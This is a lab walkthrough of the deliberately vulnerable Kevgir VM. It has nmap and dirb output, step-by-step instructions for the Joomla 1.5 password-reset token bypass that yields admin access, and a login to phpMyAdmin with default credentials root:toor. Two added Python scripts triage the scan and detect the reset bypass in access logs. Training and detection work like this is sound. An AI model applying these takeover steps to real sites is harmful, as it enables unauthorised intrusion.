Kevgir was designed by the canyoupwnme team for training, hacking practice and exploitation. Kevgir has lots of vulnerable services and web applications for testing. We are happy to announce it.
Scanning all ports in aggressive mode gives us the following result
root@kali:/var/www/html# nmap -p- -A -sV 192.168.56.102
[...]
PORT STATE SERVICE VERSION
25/tcp open ftp vsftpd 3.0.2
|_smtp-commands: SMTP: EHLO 530 Please login with USER and PASS.
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Kevgir VM
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 44879/tcp mountd
| 100005 1,2,3 59451/udp mountd
| 100021 1,3,4 44714/tcp nlockmgr
| 100021 1,3,4 58080/udp nlockmgr
| 100024 1 33372/udp status
| 100024 1 38214/tcp status
| 100227 2,3 2049/tcp nfs_acl
|_ 100227 2,3 2049/udp nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: CANYOUPWNME)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: CANYOUPWNME)
1322/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 17:32:b4:85:06:20:b6:90:5b:75:1c:6e:fe:0f:f8:e2 (DSA)
| 2048 53:49:03:32:86:0b:15:b8:a5:f1:2b:8e:75:1b:5a:06 (RSA)
|_ 256 3b:03:cd:29:7b:5e:9f:3b:62:79:ed:dc:82:c7:48:8a (ECDSA)
2049/tcp open nfs_acl 2-3 (RPC #100227)
6379/tcp open redis Redis key-value store
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
8081/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Joomla! 1.5 - Open Source Content Management
| http-robots.txt: 14 disallowed entries
| /administrator/ /cache/ /components/ /images/
| /includes/ /installation/ /language/ /libraries/ /media/
|_/modules/ /plugins/ /templates/ /tmp/ /xmlrpc/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to the Frontpage
9000/tcp open http Jetty winstone-2.9
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(winstone-2.9)
|_http-title: Dashboard [Jenkins]
36574/tcp open mountd 1-3 (RPC #100005)
38214/tcp open status 1 (RPC #100024)
40719/tcp open unknown
43973/tcp open ssh Apache Mina sshd 0.8.0 (protocol 2.0)
44714/tcp open nlockmgr 1-4 (RPC #100021)
44879/tcp open mountd 1-3 (RPC #100005)
50921/tcp open mountd 1-3 (RPC #100005)
[...]
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: CANYOUPWNME, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 4.1.6-Ubuntu)
| Computer name: canyoupwnme
| NetBIOS computer name: CANYOUPWNME
| Domain name:
| FQDN: canyoupwnme
|_ System time: 2016-07-11T15:06:20+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
[...]
I examined TCP port 111, and it serves NFS.
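Before chasing individual services, a defender would triage a scan like this one. The following Python script is an added example, not part of the original write-up: it parses a constructed excerpt of the output above (plus a showmount export listing like the one checked next) and lists the items worth fixing; the rules are my own checklist, not an nmap feature.

```python
"""Triage an `nmap -p- -A -sV` report and a `showmount -e` listing for
exposures. Added example, not from the original write-up: the sample input
is a constructed excerpt of the output above; the rules are my own checklist."""
import re

SAMPLE_NMAP = """\
6379/tcp open redis Redis key-value store
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_  Potentially risky methods: PUT DELETE
8081/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Joomla! 1.5 - Open Source Content Management
|_/administrator/ /cache/ /components/
Host script results:
|_  message_signing: disabled (dangerous, but default)
"""
SAMPLE_EXPORTS = "Export list for 192.168.56.102:\n/backup *\n"

PORT_RE = re.compile(r"^(\d+)/(?:tcp|udp)\s+\S+\s+(\S+)\s*(.*)$")
RULES = [  # (substring of "service version script-lines", finding)
    ("redis ", "Redis reachable from the network; bind to localhost, require AUTH"),
    ("Potentially risky methods", "HTTP PUT/DELETE enabled; disable unless needed"),
    ("Joomla! 1.5", "end-of-life Joomla 1.5; upgrade or decommission"),
    ("/administrator/", "admin path disclosed by robots.txt; restrict by IP or auth"),
    ("message_signing: disabled", "SMB signing disabled; enforce signing"),
]

def parse_nmap(report):
    """Map port -> 'service version script-lines'; host scripts go to port 0."""
    ports, current = {0: "host "}, 0
    for line in report.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = int(m.group(1))
            ports[current] = f"{m.group(2)} {m.group(3)} "
        elif line.startswith("Host script results"):
            current = 0
        elif line.startswith("|"):  # NSE script line for the current port
            ports[current] += line.lstrip("|_ ").rstrip() + " "
    return ports

def triage(report, exports):
    """Return sorted (port, finding) pairs a defender should act on."""
    findings = [(port, msg) for port, text in parse_nmap(report).items()
                for needle, msg in RULES if needle in text]
    # showmount lines read "/path client[,client]"; '*' exports to everyone.
    for line in exports.splitlines():
        path, _, clients = line.partition(" ")
        if path.startswith("/") and clients.strip() == "*":
            findings.append((2049, f"NFS export {path} mountable by any host"))
    return sorted(findings)
```

Host-level findings (SMB signing) are reported under port 0 since they are not tied to a single listener.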
root@kali:/var/www/html# showmount -e 192.168.56.102
Export list for 192.168.56.102:
/backup *
But I cannot mount this directory to a local path. So, let's try playing with the web applications. The default web page on port 80 looks as follows
Nice graph. Our target hosts several web applications, so it is not wise to enumerate each of them. The nmap result shows that the HTTP service on port 8081 hosts a web application with a robots.txt that, among other paths, disallows /administrator/.
Excellent! Joomla CMS! In the source code we can find information that this is version 1.5. We know that this version has a widely known exploit.
Example :
1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm
2. Write into field "token" char ' and Click OK.
3. Write new password for admin
4. Go to url : target.com/administrator/
5. Login admin with new password
OK, I did 1, 2 and 3.
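From the defender's side, the reset-token bypass leaves a recognisable trace in the web server log: the confirm/complete steps happen without the preceding reset request. The Python below is an added example, not part of the write-up; it assumes the Apache combined log format and Joomla 1.5's com_user task names requestreset, confirmreset and completereset (the page only shows the layout=confirm URL), and its log lines are constructed.

```python
"""Flag Joomla 1.5 password-reset flows in an Apache access log that skip the
e-mail step, i.e. the token-bypass procedure described above. Added example,
not part of the write-up. Assumes the combined log format and the com_user
task names requestreset/confirmreset/completereset; the sample lines are
constructed and use private addresses only."""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample: 10.0.0.5 follows the full flow; 10.0.0.9 jumps straight
# to confirmreset/completereset and then logs into the administrator panel.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Jul/2016:15:01:02 +0300] "POST /index.php?option=com_user&task=requestreset HTTP/1.1" 303 -
10.0.0.5 - - [11/Jul/2016:15:04:10 +0300] "GET /index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 200 5120
10.0.0.5 - - [11/Jul/2016:15:04:40 +0300] "POST /index.php?option=com_user&task=confirmreset HTTP/1.1" 303 -
10.0.0.5 - - [11/Jul/2016:15:05:01 +0300] "POST /index.php?option=com_user&task=completereset HTTP/1.1" 303 -
10.0.0.9 - - [11/Jul/2016:15:20:00 +0300] "GET /index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 200 5120
10.0.0.9 - - [11/Jul/2016:15:20:09 +0300] "POST /index.php?option=com_user&task=confirmreset HTTP/1.1" 303 -
10.0.0.9 - - [11/Jul/2016:15:20:30 +0300] "POST /index.php?option=com_user&task=completereset HTTP/1.1" 303 -
10.0.0.9 - - [11/Jul/2016:15:21:15 +0300] "POST /administrator/index.php HTTP/1.1" 303 -
"""

def parse(log):
    """Yield (ip, timestamp, method, path) for each well-formed line."""
    for line in log.splitlines():
        m = LOG_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
            yield m.group(1), ts, m.group(3), m.group(4)

def suspicious_resets(log, window_minutes=30):
    """Return {ip: {"bypass", "admin_login"}} for IPs that POSTed
    confirmreset/completereset with no requestreset from the same IP
    inside the window, noting whether an /administrator/ login followed."""
    last_request = {}  # ip -> time of its most recent requestreset
    flagged = defaultdict(lambda: {"bypass": False, "admin_login": False})
    for ip, ts, method, path in parse(log):
        if method != "POST":
            continue
        if "task=requestreset" in path:
            last_request[ip] = ts
        elif "task=confirmreset" in path or "task=completereset" in path:
            seen = last_request.get(ip)
            if seen is None or (ts - seen).total_seconds() > window_minutes * 60:
                flagged[ip]["bypass"] = True
        elif path.startswith("/administrator/") and ip in flagged:
            flagged[ip]["admin_login"] = True
    return {ip: dict(f) for ip, f in flagged.items() if f["bypass"]}
```

A user who opens the reset e-mail from a different address than the one that requested it will also trip this heuristic, so treat hits as leads to correlate with the mail log rather than proof.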
Great! So, let's log in as admin. After that, we have to click on Extensions and edit one of them. Executing it, we got a limited shell!
Great! Let's look at the config file
Excellent! We found valid credentials and some secret.
I have examined the target OS version and it is Ubuntu 14.04.3, so we know an effective exploit dedicated to it.
Game over!
Second way to compromise our target
So, I decided to try harder with the web application hosted on port 80. I ran Dirb and got the following result
---- Scanning URL: http://192.168.56.102/ ----
+ http://192.168.56.102/cgi-bin/ (CODE:403|SIZE:289)
+ http://192.168.56.102/index.html (CODE:200|SIZE:236)
==> DIRECTORY: http://192.168.56.102/javascript/
==> DIRECTORY: http://192.168.56.102/phpmyadmin/
+ http://192.168.56.102/server-status (CODE:403|SIZE:294)
---- Entering directory: http://192.168.56.102/javascript/ ----
==> DIRECTORY: http://192.168.56.102/javascript/jquery/
We can see that there is a /phpmyadmin/ directory. I tried to log in with default credentials and BINGO! root:toor are valid credentials.
Unfortunately we don't have enough privileges to upload a PHP backdoor via phpMyAdmin, and cannot read /etc/shadow using MySQL either.
TBU